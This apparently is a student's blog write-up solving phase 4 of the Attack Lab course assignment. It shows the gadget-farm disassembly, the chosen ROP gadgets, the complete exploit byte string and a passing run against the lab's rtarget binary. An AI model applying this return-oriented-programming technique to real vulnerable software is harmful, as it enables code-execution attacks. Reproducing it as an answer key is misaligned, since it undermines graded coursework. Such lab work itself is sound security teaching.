Skip to main content

Attack Lab: Phase 4

liblaf4/23/22Course WorkAttack_LabComputer_Organization_and_ArchitectureAbout 1 min
Run
objdump --disassemble rtarget > rtarget.asm
Read File rtarget.asm
...
0000000000401b6a <touch2>:
...
0000000000401d0f <start_farm>:
  401d0f:	b8 01 00 00 00       	mov    $0x1,%eax
  401d14:	c3                   	retq

0000000000401d15 <addval_420>:
  401d15:	8d 87 48 89 c7 94    	lea    -0x6b3876b8(%rdi),%eax
  401d1b:	c3                   	retq

0000000000401d1c <setval_146>:
  401d1c:	c7 07 58 92 90 90    	movl   $0x90909258,(%rdi)
  401d22:	c3                   	retq

0000000000401d23 <addval_451>:
  401d23:	8d 87 00 58 c3 1c    	lea    0x1cc35800(%rdi),%eax
  401d29:	c3                   	retq

0000000000401d2a <addval_158>:
  401d2a:	8d 87 48 89 c7 c3    	lea    -0x3c3876b8(%rdi),%eax
  401d30:	c3                   	retq

0000000000401d31 <setval_387>:
  401d31:	c7 07 58 c3 08 57    	movl   $0x5708c358,(%rdi)
  401d37:	c3                   	retq

0000000000401d38 <getval_439>:
  401d38:	b8 48 89 c7 c3       	mov    $0xc3c78948,%eax
  401d3d:	c3                   	retq

0000000000401d3e <getval_205>:
  401d3e:	b8 b7 d7 58 c2       	mov    $0xc258d7b7,%eax
  401d43:	c3                   	retq

0000000000401d44 <setval_398>:
  401d44:	c7 07 48 89 c7 c7    	movl   $0xc7c78948,(%rdi)
  401d4a:	c3                   	retq

0000000000401d4b <mid_farm>:
...
Design Gadget
58        popq %rax
c3        ret
48 89 c7  movq %rax, %rdi
c3        ret
Search Gadget in rtarget.asm
0000000000401d23 <addval_451>:
  401d23:	8d 87 00 58 c3 1c    	lea    0x1cc35800(%rdi),%eax
  401d29:	c3                   	retq
0000000000401d2a <addval_158>:
  401d2a:	8d 87 48 89 c7 c3    	lea    -0x3c3876b8(%rdi),%eax
  401d30:	c3                   	retq
0x3a9a6c2f
Write File phase-4.txt
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
26 1d 40 00 00 00 00 00
2f 6c 9a 3a 00 00 00 00
2c 1d 40 00 00 00 00 00
6a 1b 40 00 00 00 00 00
Run
./hex2raw < phase-4.txt > phase-4.in
./rtarget -i phase-4.in
Terminal Output
Cookie: 0x3a9a6c2f
Touch2!: You called touch2(0x3a9a6c2f)
Valid solution for level 2 with target rtarget
PASS: Sent exploit string to server to be validated.
NICE JOB!
Copyright © 2025 liblaf MIT Licensed